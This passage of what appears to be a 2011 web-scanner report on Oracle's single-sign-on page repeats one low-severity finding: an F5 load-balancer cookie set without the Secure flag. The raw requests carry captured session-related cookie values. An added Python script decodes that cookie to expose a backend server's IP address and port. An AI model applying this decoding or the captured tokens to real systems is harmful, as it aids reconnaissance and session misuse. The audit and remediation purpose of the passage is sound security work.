xMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:17 GMT
Accept-Ranges: bytes
Content-Length: 45
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXC7v6uHK6EVADUS1EHWFB01t_cd
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

GIF89a.............!.......,..............P.;

7.19. https://login.oracle.com/mysso/sso_loginui/gray-b-r-b.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/gray-b-r-b.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: BIGipServerloginadc_oracle_com_http (see the Set-Cookie header in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/gray-b-r-b.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:17 GMT
Accept-Ranges: bytes
Content-Length: 198
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXC9J6uHK6EVADUS1EHWFB01t_ch
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/

GIF89a.......................................................................................................!.......,..........C`%.dINfj.j[.n
..L....5.8.(Gk(...PR...@...C..T....d].....N...y..x.!.;

7.20. https://login.oracle.com/mysso/sso_loginui/gray-b-r-t.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/gray-b-r-t.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: BIGipServerloginadc_oracle_com_http. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/gray-b-r-t.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:16 GMT
Accept-Ranges: bytes
Content-Length: 200
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXBpu6uHK6EVADUS1EHWFB01t_cD
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:16 GMT; path=/

GIF89a.......................................................................................................!.......,..........E.$..xD...T..-......[.......G,.&D"!......"..5.U.$..r]./%.%s.YtU.e7.II..;
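
Every finding in this group reports the same cookie, BIGipServerloginadc_oracle_com_http, re-issued on each static asset of the sign-on page without the Secure attribute (and without HttpOnly). The scanner is right that it is not a session token: the BIGipServer prefix marks an F5 BIG-IP persistence cookie, and in its default unencrypted form the value `<ip>.<port>.0000` stores the selected pool member's IPv4 address and port as little-endian decimals (F5 knowledge base article K6917). The script below is an added example, not part of this report or of Burp; it audits a Set-Cookie header for the missing flags and decodes the pool member from the exact value seen in the response above. The JSESSIONID line is a constructed control case with both flags present.

```python
import re
import socket
import struct

# First header is copied from the response in finding 7.20 above; the second
# is a constructed control case with Secure and HttpOnly set.
SAMPLE_HEADERS = [
    "BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; "
    "expires=Wed, 07-Sep-2011 00:14:17 GMT; path=/",
    "JSESSIONID=abc123; Path=/; Secure; HttpOnly",  # constructed
]


def parse_set_cookie(header):
    """Split a Set-Cookie header into (name, value, {attribute: value})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def decode_bigip_cookie(value):
    """Decode an unencrypted BIG-IP persistence value '<ip>.<port>.0000'.

    Both numbers are the raw bytes read in reverse (little-endian) order,
    so 1561105037 -> bytes 8D 92 0C 5D -> 141.146.12.93 and
    16927 -> 0x421F -> bytes 1F 42 -> port 0x1F42 = 8002.
    Returns None if the value is not in that form (e.g. encrypted).
    """
    m = re.fullmatch(r"(\d+)\.(\d+)\.0000", value)
    if not m:
        return None
    ip_dec, port_dec = int(m.group(1)), int(m.group(2))
    ip = socket.inet_ntoa(struct.pack("<I", ip_dec))
    port = struct.unpack(">H", struct.pack("<H", port_dec))[0]
    return ip, port


def audit_set_cookie(header, over_https=True):
    """Return (cookie name, list of findings) for one Set-Cookie header."""
    name, value, attrs = parse_set_cookie(header)
    findings = []
    if over_https and "secure" not in attrs:
        findings.append("missing Secure")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly")
    if name.startswith("BIGipServer"):
        decoded = decode_bigip_cookie(value)
        if decoded is not None:
            findings.append("F5 pool member %s:%d exposed" % decoded)
    return name, findings


if __name__ == "__main__":
    for header in SAMPLE_HEADERS:
        name, findings = audit_set_cookie(header)
        print(name, "->", findings or ["ok"])
```

Run against the header from this finding the script reports the two missing attributes and the decoded pool member 141.146.12.93:8002, which is the practical risk here: the flag omission is low severity on its own, but the cookie hands a plain-HTTP observer the address and port of the backend behind the load balancer. The usual fixes are to set Secure (and HttpOnly) on the persistence cookie in the BIG-IP persistence profile and, where backend addresses are sensitive, to enable cookie encryption in that profile so the value is no longer decodable.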

7.21. https://login.oracle.com/mysso/sso_loginui/gray-t-line.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/gray-t-line.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: BIGipServerloginadc_oracle_com_http. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/gray-t-line.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:19 GMT
Accept-Ranges: bytes
Content-Length: 45
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCUu6uHK6EVADUS1EHWFB01t_dK
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/

GIF89a.............!.......,...........D..Y.;

7.22. https://login.oracle.com/mysso/sso_loginui/ip-o-logo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /mysso/sso_loginui/ip-o-logo.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set: BIGipServerloginadc_oracle_com_http. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mysso/sso_loginui/ip-o-logo.gif HTTP/1.1
Host: login.oracle.com
Connection: keep-alive
Referer: https://login.oracle.com/mysso/signon.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_wgw_lv_s=First%20Visit; s_nr6=1315343380933-New; s_cc=true; s_sq=oraclecom%3D%2526pid%253Docom%25253Aen-us%25253A%25252F%2526pidt%253D1%2526oid%253Docom%25253Aen%25253Ahnav%25253Aoracletechnologynetwork%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_nr=1315343639519; gpv_p24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; gpw_e24=https%3A//forums.oracle.com/forums/main.jspa%3Bjsessionid%3D8d92100330d6da02876de7a145cd8736c0803188cf3b.e38NbN0LchiOci0LbhqSc3yPchqLe0%3FcategoryID%3D84; OAM_REQ=VERSION_4~d4hmFW4tTZ6fBMqI4iwmxg8wKMhbrbTK9yAI3YwJsDZR8niVSJWQIE43%2faTUx4YsLNRc%2bYaNlouVwVVeGANguLqSp3fGGGGbUE9q1BbP6xZfiL1k7b%2fXRWyUN0IFi2E1CIf1JGrfJCY8baEP5srX4PDkoFezR1U%2f%2fnksxsi8vboCTcGSrEvfYYMQ9A777xJcDTiIG0nMiK4hkphmAuQEpt7of7dR1Fdy6zGqreMMj6LlenHxMysbwtKCBdtIssKbNyAajVYEpAK9xPTA%2bu5nz%2b1YHmlWKMgr43NRBNym2DPQhOf8EfpGjfXA%2fqcozyujOdA4LnlJDp4zSf1tuQ9A1QC5dHX6b9A9RDYpz1QeWdt9i4pgSrodhE7rrrl3es%2fLFiRFdcXU2PEARwfv5U%2fcTGFop7VSdlV87gbH%2bLHB%2bdVHHW44cj6Mmldnq4jfP9pPD%2fGvPPSiP%2bC9JL%2fCoDdhKHzaUgR9nYCUI68zAN1%2fO3ezlnT0yAdM4hkQ9C6uXh%2bBVxi3UkpFjD%2f%2bW50cvdT8YS2V7Uv10OBcKyHOWJVOvrwH9kjIlkz2YyORO4uAGtbi%2bVE9GBlu5lPYJUW1S3aPGEZKJevkM5tKayaySojBSrJxtVIXZGEnAqdnox0a5OKdZN7vGP%2fqZ7OcEJTGbsRZijVaQ31coa82mzXny8KFGzO0cgAd8BM4dT1RfBnH2d5CvRE4nHbsniOu6Dfbvwf%2fH0bQFDy1KakeLcH4Jc2T6%2bf9%2fK%2fq6aXxMzxoRH64zq5PMUWJ%2fzosSAf4ofr%2f%2fzKTvZizAf16T5m1kWzJedFc8%2fZ7O%2fl34wHmQ83UP7I7nGycluN76ovgeYCKgeaOcjC2fXbUHAPDjEw7cvDRvJyCopRzc28OuxWy6dv3G2mAhinLlqTI8xM6fDzmhwak%2benNkyyIF%2fMt7Ceh6Cw7%2fpEUMsn3PhFoaOTlm5Jdu2%2fjDs5MEhlIWJfNmTqHwwXQ466%2b19yISYmtiY9HTC%2fiNSE6JZrTdpF%2feEz06%2f%2f9ptyzwRJHl0InnmywOadz6SZUFaAd8EmzDbzmwVje72tnaeVJ8lHXsGr5ZrkhCnBpKSNoPU1%2f5df5NHlchk7RqFg5ihd11wbSgPP6BBpDqcJbTOXGu7Rdx3gIzCFAozdKejjGZmICHCJ%2fhdcHpAB6y%2b2yqaPzSCblDFlWFJxzewbkCuBteUACivxEIFP4Y20Xf8ZKj7PskKz1WhR43LNkcuSwmGw6ZzeYKqS5U8NteS%2fUt4JmOsXiTI%2fkXHcPj
RodR%2b3TTWZD83JqhppJ6BIF%2bgtpjfHP92im3llGj8cWn9f08DIt6o7Ihe5fxstOjbOnYRrNtVVw1QhgHKE%2f%2f2SqaJTT8WoHScQdn5u%2bNht7l8MQiw2Z4tcPJYBSOP2pk%2ftbu1ZGb3Gbyu2WH5xkI6r1kFQqj2BedIy7JhqweMOVu3ejQ5XGhkGVejSd%2b2dQzOyBqKWB%2bBp92IQfV7m0wu7Zjd53MHaXPFYy9qow4n0F7%2fQp3Rq1kx2irURKvfwb6SCMpOoGkHDXpcwEaCULI83JPxAsWwvOYGo9KrTAxYeKUJapWsPwiu82MZhHrD5rX3uuFXyj1Fb3oAiBiKHRRkuxTxnEIRAL3h5Nhe2X%2ff4WjVkyzF4%2b2MUe4%2bdSZAlSTVy%2b8hwOlqNLpC4ppybqB4fkot%2b1crmhVsP1vEOpHjlvqFkt899OE3ZH6Oy6yebosuE83N%2bvBLWOUxrqcxrQSWSBv8m0E8MjOtXTINaVANH6gjv4lprXgNHOEmmDPnbHzwUW%2bInPJkq2CCi7H60afpaleMYWiv2efTBcnqaDEQI8ySwzRyx%2fZbE%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:14:19 GMT
Accept-Ranges: bytes
Content-Length: 1728
Content-Type: image/gif
Last-Modified: Fri, 22 Jul 2011 08:34:46 GMT
X-ORACLE-DMS-ECID: 0000J8zXCUU6uHK6EVADUS1EHWFB01t_dJ
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:14:19 GMT; path=/

GIF89ar..........22................BB.......................................................................................................__..........................................................
